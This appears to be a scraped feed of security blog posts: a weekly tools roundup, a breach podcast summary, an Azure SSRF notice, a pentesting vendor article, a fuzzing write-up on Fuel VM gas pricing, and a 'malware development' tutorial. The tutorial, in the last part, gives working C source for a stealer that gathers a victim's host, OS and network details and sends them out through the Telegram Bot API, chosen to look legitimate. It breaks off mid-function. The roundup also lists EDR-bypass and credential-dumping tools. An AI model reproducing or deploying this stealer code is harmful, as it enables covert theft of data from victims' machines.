
Last Week in Security (LWiS) - 2024-06-17

By: Erik
18 June 2024 at 03:59

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the past week. This post covers 2024-06-10 to 2024-06-17.

News

Techniques and Write-ups

Tools and Exploits

  • Voidgate - A technique that can be used to bypass AV/EDR memory scanners. This can be used to hide well-known and detected shellcodes (such as msfvenom) by performing on-the-fly decryption of individual encrypted assembly instructions, thus rendering memory scanners useless for that specific memory page.
  • Hunt-Sleeping-Beacons - Aims to identify sleeping beacons.
  • Invoke-ADEnum - Automate Active Directory Enumeration.
  • QRucible - Python utility that generates "imageless" QR codes in various formats.
  • RdpStrike - Positional Independent Code to extract clear text password from mstsc.exe using API Hooking via HWBP.
  • Deobfuscar - A simple commandline application to automatically decrypt strings from Obfuscator protected binaries.
  • gcpwn - Enumeration/exploit/analysis/download/etc pentesting framework for GCP; modeled like Pacu for AWS; a product of numerous hours via @WebbinRoot.
  • honeyzure - HoneyZure is a honeypot tool specifically designed for Azure environments, fully provisioned through Terraform. It leverages a Log Analytics Workspace to ingest logs from various Azure resources, generating alerts whenever the deceptive Azure resources are accessed.
  • SteppingStones - A Red Team Activity Hub.
  • CVE-2024-26229 - CWE-781: Improper Address Validation in IOCTL with METHOD_NEITHER I/O Control Code.
  • CVE-2024-26229-BOF - BOF implementations of CVE-2024-26229 for Cobalt Strike and BruteRatel.
  • profiler-lateral-movement - Lateral Movement via the .NET Profiler.
  • SlackEnum - A user enumeration tool for Slack.
  • ScriptBlock-Smuggling - Example code samples from our ScriptBlock Smuggling Blog post.
  • NativeDump - Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!).

New to Me and Miscellaneous

This section is for news, techniques, write-ups, tools, and off-topic items that weren't released last week but are new to me. Perhaps you missed them too!

  • nowafpls - Burp Plugin to Bypass WAFs through the insertion of Junk Data.
  • lazyegg - LazyEgg is a powerful tool for extracting various types of data from a target URL. It can extract links, images, cookies, forms, JavaScript URLs, localStorage, Host, IP, and leaked credentials.
  • KeyCluCask - Simple and handy overview of applications shortcuts.
  • security-hub-compliance-analyzer - A compliance analysis tool which enables organizations to more quickly articulate their compliance posture and also generate supporting evidence artifacts.
  • Nemesis-Ansible - Automatically deploy Nemesis.
  • Packer_Development - Slides & Code snippets for a workshop held @ x33fcon 2024.
  • InsightEngineering - Hardcore Debugging.

Techniques, tools, and exploits linked in this post are not reviewed for quality or safety. Do your own research and testing.


Roku’s hacked data breach – will we never learn our lesson? | Guest Zarik Megerdichian

By: Infosec
17 June 2024 at 18:00

Zarik Megerdichian, the co-founder of personal privacy controller company Loop8, joins me in breaking down the recent Roku breach, which landed hackers a whopping 15,000 users' worth of vital data. Megerdichian and I discuss the failings of the current data collection and storage model, and the case for moving to a model in which biometrics is the primary identification method, coupled with a system of contacts who can vouch for you in the event that your device is lost or stolen. It’s another interesting approach to privacy and online identity in the age of the never-ending breach announcement parade.

– Get your FREE cybersecurity training resources: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

0:00 - Roku's data breach
1:54 - First, getting into computers
5:45 - Megerdichian's company goals
9:29 - What happened during the Roku data breach?
11:20 - The state of data collection
14:16 - Unnecessary online data collection
16:26 - Best data storage protection
17:56 - A change in data collection
20:49 - What does Loop8 do?
24:09 - Disincentivizing hackers
25:21 - Biometric account recovery
30:09 - How to work in the biometric data field
33:10 - Challenges of biometric data recovery work
34:46 - Skills gaps in biometric data field
36:59 - Megerdichian's favorite part of the work day
37:46 - Importance of cybersecurity mentorship
41:03 - Best cybersecurity career advice
43:33 - Learn more about Loop8 and Megerdichian
44:34 - Outro

About Infosec
Infosec’s mission is to put people at the center of cybersecurity. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and phishing training to stay cyber-safe at work and home. More than 70% of the Fortune 500 have relied on Infosec Skills to develop their security talent, and more than 5 million learners worldwide are more cyber-resilient from Infosec IQ’s security awareness training. Learn more at infosecinstitute.com.


Mitigating SSRF Vulnerabilities Impacting Azure Machine Learning

Summary: On May 9, 2024, Microsoft successfully addressed multiple vulnerabilities within the Azure Machine Learning (AML) service, which were initially discovered by security research firms Wiz and Tenable. These vulnerabilities, which included Server-Side Request Forgeries (SSRF) and a path traversal vulnerability, posed potential risks for information exposure and service disruption via Denial-of-Service (DoS).

Enhancing Vulnerability Management: Integrating Autonomous Penetration Testing

17 June 2024 at 15:53

Revolutionizing Cybersecurity with NodeZero™ for Comprehensive Risk Assessment and Prioritization

Traditional vulnerability scanning tools have been essential for identifying systems running software with known vulnerabilities. These tools form the foundation of many Vulnerability Management (VM) programs and have long been used to conduct vulnerability assessments. However, despite their widespread use, these tools face limitations because not all vulnerabilities they flag are exploitable without specific conditions being met.

For instance, the National Vulnerability Database (NVD) Dashboard, managed by the National Institute of Standards and Technology (NIST), currently tracks over 253,000 entries, with new software vulnerabilities being added daily. The primary challenge lies in determining how many of these vulnerabilities have known exploits, are actively being exploited in the wild, or are even exploitable within a specific environment. Organizations continuously struggle with this uncertainty, which complicates the assessment and prioritization of vulnerabilities.

To help address this issue, the Cybersecurity and Infrastructure Security Agency (CISA) initiated the Known Exploited Vulnerabilities (KEV) Catalog in 2021. This catalog aims to help the industry track and mitigate vulnerabilities known to be widely exploited. As of now, the CISA KEV Catalog contains 1120 entries. Prior to this initiative, there was no comprehensive record of Common Vulnerabilities and Exposures (CVEs) that were successfully exploited in the wild. This gap highlights the challenge of relying solely on vulnerability scanning tools for measuring and quantifying risk, underscoring the need for more context-aware approaches in vulnerability management.

The Challenge of Prioritizing “Exploitable” Vulnerabilities

Organizations purchase vulnerability scanning tools to identify systems running known vulnerable software. However, without effective prioritization based on exploitability, they are often left uncertain about where to focus their remediation efforts. Prioritization of exploitability is crucial for effective VM initiatives, enabling organizations to address the most critical vulnerabilities first.

For example, Art Ocain, Airiam’s CISO & Incident Response Product Management Lead, noted that many available vulnerability scanning tools were basic and time-consuming. These tools scanned client environments, then compared results with a vulnerability list, and flagged discrepancies without providing the necessary detail and nuance. This approach failed to convince clients to act quickly and did not empower them to prioritize fixing the most critical issues. The challenge of not knowing if a vulnerability is exploitable is widely acknowledged within the industry.

Jim Beers, Director of Information Security at Moravian University, tends to agree. He mentions that traditional vulnerability scanners are good at identifying and describing vulnerabilities in general, but often fall short in providing actionable guidance.

“Our past vulnerability scanner told me what vulnerabilities were of high or low severity and if there is an exploit, but it didn’t tell me why…there was too much information without enough direction or actionable insights.”

Combining Vulnerability Scanning and Autonomous Pentesting

To address the challenge of prioritizing exploitability, vulnerability scanning efforts that primarily detect known vulnerabilities are now being enhanced by integrating the NodeZero autonomous penetration testing platform into VM programs. This combined approach is revolutionizing VM processes, offering significant advantages.

Calvin Engen, CTO at F12.net, agrees: “The value that you get by doing this activity, and by leveraging NodeZero, is achieving far more visibility into your environment than you ever had before. And through that visibility, you can really break down the items that are most exploitable and solve for those.”

NodeZero's Advantages Over Traditional Scanning Tools

NodeZero surpasses the limitations of traditional scanning tools that primarily scan an environment using a list of known CVEs. Traditional scanners are proficient in detecting well-documented vulnerabilities of the services, systems, and applications in use, but they often miss the nuanced security issues that are prevalent.

NodeZero fills this gap by going beyond known and patchable vulnerabilities to surface weaknesses such as easily compromised credentials, exposed data, misconfigurations, poor security controls, and weak policies – subtleties that can be just as detrimental as well-known vulnerabilities. Additionally, NodeZero enables organizations to look at their environment as an attacker would, illuminating their exploitable attack surface and vectors. By integrating autonomous pentesting into VM programs, organizations benefit from a more comprehensive view of their security posture, arming them with the insights needed to thwart not only the common threats but also the hidden ones that could slip under the radar of conventional VM programs.

As Jon Isaacson, Principal Consultant at JTI Cybersecurity, explains, “without taking an attacker's perspective by considering actual attack vectors that they can use to get in, you really can’t be ready.”

Exploitability Analysis

Understanding the difference between known vulnerabilities and exploitable vulnerabilities, and measuring exploitability, is key to risk reduction. NodeZero excels at validating and proving whether a vulnerability is, in fact, exploitable, and what impact its exploitation can lead to. This capability of autonomous penetration testing is crucial because it empowers security teams to strategize their remediation efforts, focusing on vulnerabilities that could be actively exploited by attackers, thus enhancing the overall effectiveness of VM programs.

Risk Prioritization

Another area where traditional vulnerability scanning approaches fall short is risk prioritization. Often, detected vulnerabilities are assigned a broad risk level without considering the specific context of how the software or application is being used within the organization. NodeZero diverges from this path by evaluating the potential downstream impacts of a vulnerability being exploited by highlighting what can happen next. This context-based prioritization of risks directs attention and resources to the vulnerabilities that could lead to severe consequences for an organization’s operations and compromise the integrity of its security efforts. By doing so, NodeZero ensures that the most critical vulnerabilities are identified as a priority for remediation efforts.

Cross-Host Vulnerability Chaining

NodeZero organically executes complex attack scenarios by chaining vulnerabilities and weaknesses across different hosts. This reveals how attackers could exploit multiple, seemingly insignificant vulnerabilities in conjunction to orchestrate a sophisticated attack, potentially compromising other critical systems or accessing sensitive information that may otherwise be inaccessible. This capability of chaining vulnerabilities across hosts is indispensable for understanding the available attack paths attackers could capitalize on. Through this approach, organizations gain insight into how an attacker will navigate through their network, piecing together a path of least resistance and escalating privileges to reach critical assets.

Integration and Automation with NodeZero API

Upon completing a NodeZero penetration test, the NodeZero API allows for the extraction and integration of test results into existing VM workflows. This means that organizations can automatically import detailed exploitation results into their vulnerability management reporting systems. The seamless integration of NodeZero with VM processes enables organizations to accurately classify and prioritize security weaknesses based on real-world exploitability and potential impacts. By focusing on remediating the most exploitable security weaknesses, organizations are not just patching vulnerabilities; they are strategically enhancing their defenses against the threats that matter most.
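As an illustration of what that plumbing could look like, here is a sketch only: the endpoint paths, field names, and ticketing call below are hypothetical placeholders, not the actual NodeZero API schema.

import requests

# Hypothetical sketch: pull the results of a completed pentest and file the
# proven-exploitable weaknesses into an existing VM tracking system.
# All endpoint paths and JSON field names here are illustrative assumptions.
API = "https://nodezero.example.com/api"
HEADERS = {"Authorization": "Bearer <api-key>"}

weaknesses = requests.get(f"{API}/pentests/latest/weaknesses", headers=HEADERS).json()
for w in weaknesses:
    if w.get("proven_exploitable"):                 # validated, not just flagged
        requests.post("https://vm-tracker.example.com/tickets", json={
            "title": w["name"],
            "priority": w["downstream_impact"],     # context-based priority
        })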

Conclusion

The integration of autonomous penetration testing into Vulnerability Management (VM) programs marks a significant revolution in the field of cybersecurity. While traditional vulnerability scanning tools are indispensable for identifying systems potentially running known vulnerable software, they fall short in prioritizing vulnerabilities based on exploitability. This gap leaves organizations uncertain about where to focus their remediation efforts, a challenge that has become more pronounced with the increasing complexity and prevalence of nuanced security issues.

NodeZero addresses these limitations by combining the strengths of traditional scanning with the advanced capabilities of autonomous penetration testing. This integration enhances VM programs by providing a more comprehensive view of an organization’s security posture. NodeZero excels in exploitability analysis, risk prioritization, and cross-host vulnerability chaining, offering insights into both common and hidden threats. Furthermore, the seamless integration of NodeZero within existing VM workflows through its API allows for accurate classification and prioritization of security weaknesses based on real-world exploitability and potential impacts.

By focusing remediation efforts on the most critical vulnerabilities while looking at their attack surface through the eyes of an attacker, organizations can strategically enhance their defenses against the threats that matter most, in less time, and with more return on effort. This combined approach not only improves the effectiveness of VM programs but also empowers security teams to proactively manage and mitigate risks in a dynamic threat landscape. The revolution of integrating autonomous penetration testing into VM programs is a transformative step towards more robust and resilient cybersecurity practices.

Download the PDF

The post Enhancing Vulnerability Management: Integrating Autonomous Penetration Testing appeared first on Horizon3.ai.

Finding mispriced opcodes with fuzzing

17 June 2024 at 13:00

By Max Ammann

Fuzzing—a testing technique that tries to find bugs by repeatedly executing test cases and mutating them—has traditionally been used to detect segmentation faults, buffer overflows, and other memory corruption vulnerabilities that are detectable through crashes. But it has additional uses you may not know about: given the right invariants, we can use it to find runtime errors and logical issues.

This blog post explains how Trail of Bits developed a fuzzing harness for Fuel Labs and used it to identify opcodes that charge too little gas in the Fuel VM, the platform on which Fuel smart contracts run. By implementing a similar fuzzing setup with carefully chosen invariants, you can catch crucial bugs in your smart contract platform.

How we developed a fuzzing harness and seed corpus

The Fuel VM had an existing fuzzer that used cargo-fuzz and libFuzzer. However, it had several downsides. First, it did not call internal contracts. Second, it was somewhat slow (~50 exec/s). Third, it used the arbitrary crate to generate random programs consisting of just vectors of Instructions.

We developed a fuzzing harness that allows the fuzzer to execute scripts that call internal contracts. The harness still uses cargo-fuzz to execute. However, we replaced libFuzzer with a shim provided by the LibAFL project. The LibAFL runtime allows executing test cases on multiple cores and increases the fuzzing performance to ~1,000 exec/s on an eight-core machine.

After analyzing the output of the Sway compiler, we noticed that plain data is interleaved with actual instructions in the compiler’s output. Thus, simple vectors of instructions do not accurately represent the output of the Sway compiler. But even worse, Sway compiler output could not be used as a seed corpus.

To address these issues, the fuzzer input had to be redesigned. The input to the fuzzer is now a byte vector that contains the script assembly, script data, and the assembly of a contract to be called. Each of these is separated by an arbitrarily chosen, 64-bit magic value (0x00ADBEEF5566CEAA). Because of this redesign, compiled Sway programs can be used as input to the seed corpus (i.e., as initial test cases). We used the examples from the Sway repository as initial input to speed up the fuzzing campaign.
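For illustration, assembling such an input could look like the following sketch (the byte order of the magic separator is an assumption):

# Build a fuzzer input: script assembly, script data, and contract assembly,
# separated by the 64-bit magic value described above.
MAGIC = (0x00ADBEEF5566CEAA).to_bytes(8, "big")  # byte order is an assumption

def build_input(script_asm: bytes, script_data: bytes, contract_asm: bytes) -> bytes:
    return script_asm + MAGIC + script_data + MAGIC + contract_asm

seed = build_input(b"\x00" * 8, b"some script data", b"\x00" * 8)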

The LibAFL-based fuzzer is implemented as a Rust binary with subcommands for generating seeds, executing test cases in isolation, collecting gas usage statistics of test cases, and actually executing the fuzzer. Its README includes instructions for running it. The source code for the fuzzer can be found in FuelLabs/fuel-vm#724.

Challenges encountered

During our audit, we had to overcome a number of challenges. These included the following:

  • The secp256k1 0.27.0 dependency is currently incompatible with cargo-fuzz because it enables a special fuzzing mode automatically that breaks secp256k1’s functionality. We applied the following dependency declaration in fuel-crypto/Cargo.toml:20:

    Figure 1: Updated dependency declaration

  • The LibAFL shim is not stable and is not yet part of any release. As a result, bugs are expected, but due to the performance improvements, it is still worthwhile to consider using it over the default fuzzer runtime.
  • We were looking for a way to pass in the offset to the script data to the program that is executed in the fuzzer. We decided to do this by patching the fuel-vm. The fuel-vm writes the offset into the register 0x10 before executing the actual program. That way, programs can reliably access the script data offset. Also, seed inputs continue to execute as expected. The following change was necessary in fuel-vm/src/interpreter/executors/main.rs:523:

    Figure 2: Write the script data offset to register 0x10

Additionally, we added the following test case to the seed corpus that uses this behavior.

Figure 3: Test case for using the now-available script data offset

Using fuzzing to analyze gas usage

The corpus created by a fuzzing campaign can be used to analyze the gas usage of assembly programs. Gas usage is expected to correlate strongly with execution time (note that execution time is a proxy for the number of CPU cycles spent).

Our analysis of the Fuel VM’s gas usage consists of three steps:

  1. Launch a fuzzing campaign.
  2. Execute cargo run --bin collect <file/dir> on the corpus, which yields a gas_statistics.csv file.
    • Examine and plot the result of the gathered data using the Python script from figure 4.
  3. Identify the outliers and execute the test cases in the corpus. During the execution, gather data about which instructions are executed and for how long.
    • Examine the collected data by grouping it by instruction and reducing it to a table which shows which instructions cause high execution times.

This section describes each step in more detail.

Step 1: Fuzz

The cargo-fuzz tool will output the corpus in the directory corpus/grammar_aware. The fuzzer tries to find inputs that increase the coverage. Furthermore, the LibAFL fuzzer prefers short inputs that yield a long execution time. This goal is interesting because it could uncover operations that do not consume very much gas but spend a long time executing.

Step 2: Collect data and evaluate

The Python script in figure 4 loads the CSV file created by invoking cargo run --bin collect <file/dir>. It then plots the execution time vs. gas consumption. This already reveals that there are some outliers that take longer to execute than other test cases while using the same amount of gas.

Figure 4: Python script to determine gas usage vs execution time of the discovered test inputs
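The original post renders figure 4 as an image; a rough sketch of such a script might look like the following (the gas_statistics.csv column names gas and time_ms are assumptions):

import pandas as pd
import matplotlib.pyplot as plt

# Load the CSV produced by `cargo run --bin collect <file/dir>` and plot
# execution time against gas consumption to make outliers visible.
df = pd.read_csv("gas_statistics.csv")
df.plot.scatter(x="gas", y="time_ms")
plt.xlabel("gas consumed")
plt.ylabel("execution time (ms)")
plt.show()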

Figure 5: Results of running the script in figure 4

Step 3: Identify and analyze outliers

The Python script in figure 6 performs a linear regression through the data. Then, we determine which test cases are more than 1,000ms off from the regression and store them in the inspect variable. The results appear in figure 7.

Figure 6: Python script to perform linear regression over the test data
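Figure 6 is also an image in the original; a sketch of the regression step, under the same column-name assumptions as above, might be:

import numpy as np
import pandas as pd

df = pd.read_csv("gas_statistics.csv")
# Fit a line through time-vs-gas, then flag test cases whose execution time
# lies more than 1,000 ms above the regression line.
slope, intercept = np.polyfit(df["gas"], df["time_ms"], 1)
residuals = df["time_ms"] - (slope * df["gas"] + intercept)
inspect = df[residuals > 1000]
print(inspect)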

Figure 7: Results of running the script in figure 6

Finally, we re-execute the corpus with specific changes applied to gather data about which instructions are responsible for the long execution times. The changes are the following:

  • Add let start = Instant::now(); at the beginning of function instruction_inner.
  • Add println!("{:?}\t{:?}", instruction.opcode(), start.elapsed().as_nanos()); at the end of the function.

These changes cause the execution of a test case to print out the opcode and the execution time of each instruction.

Figure 8: Investigation of the contribution to execution time for each instruction

The outputs for Fuel’s opcodes are shown below:

Figure 9: Results of running the script in figure 8

The above evaluation shows that the opcodes MCLI, SCWQ, K256, SWWQ, and SRWQ may be mispriced. For SCWQ, SWWQ, and K256, the results were expected because we had already discovered problematic behavior through fuzzing. Each of these issues appears to be resolved (see FuelLabs/fuel-vm#537). This analysis also shows that there might be a pricing issue for SRWQ. We are unsure why MCLI shows up in our analysis; this may be due to noise in our data, as we could not find an immediate issue with its implementation and pricing.

Lessons learned

As the project evolves, it is essential that the Fuel team continues running a fuzzing campaign on code that introduces new functionality, or on functions that handle untrusted data. We suggested the following to the Fuel team:

  • Run the fuzzer for at least 72 hours (or ideally, a week). While there is currently no tooling to determine the ideal execution time, the coverage data gives a good estimate of when to stop fuzzing. We saw no more valuable progress from the fuzzer after executing it for more than 72 hours.
  • Pause the fuzzing campaign whenever new issues are found. Developers should triage them, fix them, and then resume the fuzzing. This will reduce the effort needed during triage and issue deduplication.
  • Fuzz test major releases of the Fuel VM, particularly after major changes. Fuzz testing should be integrated as part of the development process, and should not be conducted only once in a while.

Once the fuzzing procedure has been tuned to be fast and efficient, it should be properly integrated in the development cycle to catch bugs. We recommend the following procedure to integrate fuzzing using a CI system, for instance by using ClusterFuzzLite (see FuelLabs/fuel-vm#727):

  1. After the initial fuzzing campaign, save the corpus generated by every test.
  2. For every internal milestone, new feature, or public release, re-run the fuzzing campaign for at least 24 hours starting with each test’s current corpus.1
  3. Update the corpus with the new inputs generated.

Note that, over time, the corpus will come to represent thousands of CPU hours of refinement, and will be very valuable for guiding efficient code coverage during fuzz testing. An attacker could also use a corpus to quickly identify vulnerable code; this additional risk can be avoided by keeping fuzzing corpora in an access-controlled storage location rather than a public repository. Some CI systems allow maintainers to keep a cache to accelerate building and testing. The corpora could be included in such a cache, if they are not very large.

Future work

In the future, we recommend that Fuel expand the assertions used in the fuzzing harness, especially for the execution of blocks. For example, the assertions found in unit tests could serve as inspiration for implementing additional checks that are evaluated during fuzzing.

Additionally, we encountered an issue with the required alignment of programs. Programs for the Fuel VM must be 32-bit aligned. The current fuzzer does not honor this alignment, and thus easily produces invalid programs, e.g., by inserting only one byte instead of four. This can be solved in the future by either using a grammar-based approach or adding custom mutations that honor the alignment.

Instead of performing the fuzzing in-house, one could use the oss-fuzz project, which performs automatic fuzzing campaigns with Google’s extensive testing infrastructure. oss-fuzz is free for widely used open-source software. We believe they would accept Fuel as another project.

On the plus side, Google provides all their infrastructure for free and will notify project maintainers any time a change in the source code introduces a new issue. The received reports include essential information such as minimized test cases and backtraces.

However, there are some downsides: If oss-fuzz discovers critical issues, Google employees will be the first to know, even before the Fuel project’s own developers. Google policy also requires the bug report to be made public after 90 days, which may or may not be in the best interests of Fuel. Weigh these benefits and risks when deciding whether to request Google’s free fuzzing resources.

If Trail of Bits can help you with fuzzing, please reach out!

1 For more on fuzz-driven development, see this CppCon 2017 talk by Kostya Serebryany of Google.

Malware development trick 40: Stealing data via legit Telegram API. Simple C example.

16 June 2024 at 02:00

Hello, cybersecurity enthusiasts and white hackers!


At one of my recent presentations, at the BSides Prishtina conference, the audience asked how attackers use legitimate services to manage malware (C2) or steal data from a victim's host.

This post shows a simple proof of concept of using the Telegram Bot API to steal information from a Windows host.

practical example

Let’s imagine that we want to create a simple stealer that will send us data about the victim’s host. Something simple like systeminfo and adapter info:

char systemInfo[4096];

// get host name
CHAR hostName[MAX_COMPUTERNAME_LENGTH + 1];
DWORD size = sizeof(hostName) / sizeof(hostName[0]);
GetComputerNameA(hostName, &size);  // Use GetComputerNameA for CHAR

// get OS version
OSVERSIONINFO osVersion;
osVersion.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
GetVersionEx(&osVersion);

// get system information
SYSTEM_INFO sysInfo;
GetSystemInfo(&sysInfo);

// get logical drive information
DWORD drives = GetLogicalDrives();

// get IP address
IP_ADAPTER_INFO adapterInfo[16];  // Assuming there are no more than 16 adapters
DWORD adapterInfoSize = sizeof(adapterInfo);
if (GetAdaptersInfo(adapterInfo, &adapterInfoSize) != ERROR_SUCCESS) {
printf("GetAdaptersInfo failed. error: %d has occurred.\n", GetLastError());
return false;
}

snprintf(systemInfo, sizeof(systemInfo),
  "Host Name: %s\n"  // Use %s for CHAR
  "OS Version: %d.%d.%d\n"
  "Processor Architecture: %d\n"
  "Number of Processors: %d\n"
  "Logical Drives: %X\n",
  hostName,
  osVersion.dwMajorVersion, osVersion.dwMinorVersion, osVersion.dwBuildNumber,
  sysInfo.wProcessorArchitecture,
  sysInfo.dwNumberOfProcessors,
  drives);

// Add IP address information
for (PIP_ADAPTER_INFO adapter = adapterInfo; adapter != NULL; adapter = adapter->Next) {
snprintf(systemInfo + strlen(systemInfo), sizeof(systemInfo) - strlen(systemInfo),
  "Adapter Name: %s\n"
  "IP Address: %s\n"
  "Subnet Mask: %s\n"
  "MAC Address: %02X-%02X-%02X-%02X-%02X-%02X\n",
  adapter->AdapterName,
  adapter->IpAddressList.IpAddress.String,
  adapter->IpAddressList.IpMask.String,
  adapter->Address[0], adapter->Address[1], adapter->Address[2],
  adapter->Address[3], adapter->Address[4], adapter->Address[5]);
}

But if we send such information directly to some IP address, it will look strange and suspicious.
What if we instead create a Telegram bot and use it to send the information to us?

First of all, create a simple Telegram bot:


As you can see, we can use HTTP API for conversation with this bot.
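For reference, the same sendMessage call can be made from Python with requests (TOKEN and CHAT_ID are placeholders):

import requests

TOKEN = "YOUR_TOKEN_HERE"
CHAT_ID = "466662506"

# Send a message through the Bot API; this is exactly what the C code
# later in this post does with WinHTTP.
resp = requests.post(
    f"https://api.telegram.org/bot{TOKEN}/sendMessage",
    data={"chat_id": CHAT_ID, "text": "meow-meow"},
)
print(resp.status_code, resp.text)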

At the next step, install the Telegram library for Python:

python3 -m pip install python-telegram-bot


Then I slightly modified a simple echo-bot script - mybot.py:

#!/usr/bin/env python
# pylint: disable=unused-argument
# This program is dedicated to the public domain under the CC0 license.

"""
Simple Bot to reply to Telegram messages.

First, a few handler functions are defined. Then, those functions are passed to
the Application and registered at their respective places.
Then, the bot is started and runs until we press Ctrl-C on the command line.

Usage:
Basic Echobot example, repeats messages.
Press Ctrl-C on the command line or send a signal to the process to stop the
bot.
"""

import logging

from telegram import ForceReply, Update
from telegram.ext import Application, CommandHandler, ContextTypes, MessageHandler, filters

# Enable logging
logging.basicConfig(
    format="%(asctime)s - %(name)s - %(levelname)s - %(message)s", level=logging.INFO
)
# set higher logging level for httpx to avoid all GET and POST requests being logged
logging.getLogger("httpx").setLevel(logging.WARNING)

logger = logging.getLogger(__name__)

# Define a few command handlers. These usually take the two arguments update and
# context.
async def start(update: Update, context: ContextTypes.DEFAULT_TYPE) -> None:
    """Send a message when the command /start is issued."""
    user = update.effective_user
    await update.message.reply_html(
        rf"Hi {user.mention_html()}!",
        reply_markup=ForceReply(selective=True),
    )

async def help_command(update: Update, context: ContextTypes.DEFAULT_TYPE) -> None:
    """Send a message when the command /help is issued."""
    await update.message.reply_text("Help!")

async def echo(update: Update, context: ContextTypes.DEFAULT_TYPE) -> None:
    """Echo the user message."""
    print(update.message.chat_id)
    await update.message.reply_text(update.message.text)

def main() -> None:
    """Start the bot."""
    # Create the Application and pass it your bot's token.
    application = Application.builder().token("my token here").build()

    # on different commands - answer in Telegram
    application.add_handler(CommandHandler("start", start))
    application.add_handler(CommandHandler("help", help_command))

    # on non command i.e message - echo the message on Telegram
    application.add_handler(MessageHandler(filters.TEXT & ~filters.COMMAND, echo))

    # Run the bot until the user presses Ctrl-C
    application.run_polling(allowed_updates=Update.ALL_TYPES)


if __name__ == "__main__":
    main()

As you can see, I added printing chat ID logic:

async def echo(update: Update, context: ContextTypes.DEFAULT_TYPE) -> None:
    """Echo the user message."""
    print(update.message.chat_id)
    await update.message.reply_text(update.message.text)

Let’s check this simple logic:

python3 mybot.py


As you can see, the chat ID is successfully printed.

For sending data via the Telegram Bot API, I created this simple function:

// send data to Telegram channel using winhttp
int sendToTgBot(const char* message) {
  const char* chatId = "466662506";
  HINTERNET hSession = NULL;
  HINTERNET hConnect = NULL;

  hSession = WinHttpOpen(L"UserAgent", WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, WINHTTP_NO_PROXY_NAME, WINHTTP_NO_PROXY_BYPASS, 0);
  if (hSession == NULL) {
    fprintf(stderr, "WinHttpOpen. Error: %d has occurred.\n", GetLastError());
    return 1;
  }

  hConnect = WinHttpConnect(hSession, L"api.telegram.org", INTERNET_DEFAULT_HTTPS_PORT, 0);
  if (hConnect == NULL) {
    fprintf(stderr, "WinHttpConnect. error: %d has occurred.\n", GetLastError());
    WinHttpCloseHandle(hSession);
    return 1;  // bail out: no connection handle
  }

  HINTERNET hRequest = WinHttpOpenRequest(hConnect, L"POST", L"/bot---xxxxxxxxYOUR_TOKEN_HERExxxxxx---/sendMessage", NULL, WINHTTP_NO_REFERER, WINHTTP_DEFAULT_ACCEPT_TYPES, WINHTTP_FLAG_SECURE);
  if (hRequest == NULL) {
    fprintf(stderr, "WinHttpOpenRequest. error: %d has occurred.\n", GetLastError());
    WinHttpCloseHandle(hConnect);
    WinHttpCloseHandle(hSession);
    return 1;  // bail out: no request handle
  }

  // construct the request body
  char requestBody[512];
  sprintf(requestBody, "chat_id=%s&text=%s", chatId, message);

  // set the headers
  if (!WinHttpSendRequest(hRequest, L"Content-Type: application/x-www-form-urlencoded\r\n", -1, requestBody, strlen(requestBody), strlen(requestBody), 0)) {
    fprintf(stderr, "WinHttpSendRequest. Error %d has occurred.\n", GetLastError());
    WinHttpCloseHandle(hRequest);
    WinHttpCloseHandle(hConnect);
    WinHttpCloseHandle(hSession);
    return 1;
  }

  WinHttpCloseHandle(hConnect);
  WinHttpCloseHandle(hRequest);
  WinHttpCloseHandle(hSession);

  printf("successfully sent to tg bot :)\n");
  return 0;
}

So the full source code looks like this - hack.c:

/*
 * hack.c
 * sending victim's systeminfo via 
 * legit URL: Telegram Bot API
 * author @cocomelonc
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#include <winhttp.h>
#include <iphlpapi.h>

// send data to Telegram channel using winhttp
int sendToTgBot(const char* message) {
  const char* chatId = "466662506";
  HINTERNET hSession = NULL;
  HINTERNET hConnect = NULL;

  hSession = WinHttpOpen(L"UserAgent", WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, WINHTTP_NO_PROXY_NAME, WINHTTP_NO_PROXY_BYPASS, 0);
  if (hSession == NULL) {
    fprintf(stderr, "WinHttpOpen. Error: %d has occurred.\n", GetLastError());
    return 1;
  }

  hConnect = WinHttpConnect(hSession, L"api.telegram.org", INTERNET_DEFAULT_HTTPS_PORT, 0);
  if (hConnect == NULL) {
    fprintf(stderr, "WinHttpConnect. error: %d has occurred.\n", GetLastError());
    WinHttpCloseHandle(hSession);
    return 1;  // bail out: no connection handle
  }

  HINTERNET hRequest = WinHttpOpenRequest(hConnect, L"POST", L"/bot----TOKEN----/sendMessage", NULL, WINHTTP_NO_REFERER, WINHTTP_DEFAULT_ACCEPT_TYPES, WINHTTP_FLAG_SECURE);
  if (hRequest == NULL) {
    fprintf(stderr, "WinHttpOpenRequest. error: %d has occurred.\n", GetLastError());
    WinHttpCloseHandle(hConnect);
    WinHttpCloseHandle(hSession);
    return 1;  // bail out: no request handle
  }

  // construct the request body
  char requestBody[512];
  sprintf(requestBody, "chat_id=%s&text=%s", chatId, message);

  // set the headers
  if (!WinHttpSendRequest(hRequest, L"Content-Type: application/x-www-form-urlencoded\r\n", -1, requestBody, strlen(requestBody), strlen(requestBody), 0)) {
    fprintf(stderr, "WinHttpSendRequest. Error %d has occurred.\n", GetLastError());
    WinHttpCloseHandle(hRequest);
    WinHttpCloseHandle(hConnect);
    WinHttpCloseHandle(hSession);
    return 1;
  }

  WinHttpCloseHandle(hConnect);
  WinHttpCloseHandle(hRequest);
  WinHttpCloseHandle(hSession);

  printf("successfully sent to tg bot :)\n");
  return 0;
}

// get systeminfo and send to chat via tgbot logic
int main(int argc, char* argv[]) {

  // test tgbot sending message
  char test[1024];
  const char* message = "meow-meow";
  snprintf(test, sizeof(test), "{\"text\":\"%s\"}", message);
  sendToTgBot(test);

  char systemInfo[4096];

  // Get host name
  CHAR hostName[MAX_COMPUTERNAME_LENGTH + 1];
  DWORD size = sizeof(hostName) / sizeof(hostName[0]);
  GetComputerNameA(hostName, &size);  // Use GetComputerNameA for CHAR

  // Get OS version
  OSVERSIONINFO osVersion;
  osVersion.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
  GetVersionEx(&osVersion);

  // Get system information
  SYSTEM_INFO sysInfo;
  GetSystemInfo(&sysInfo);

  // Get logical drive information
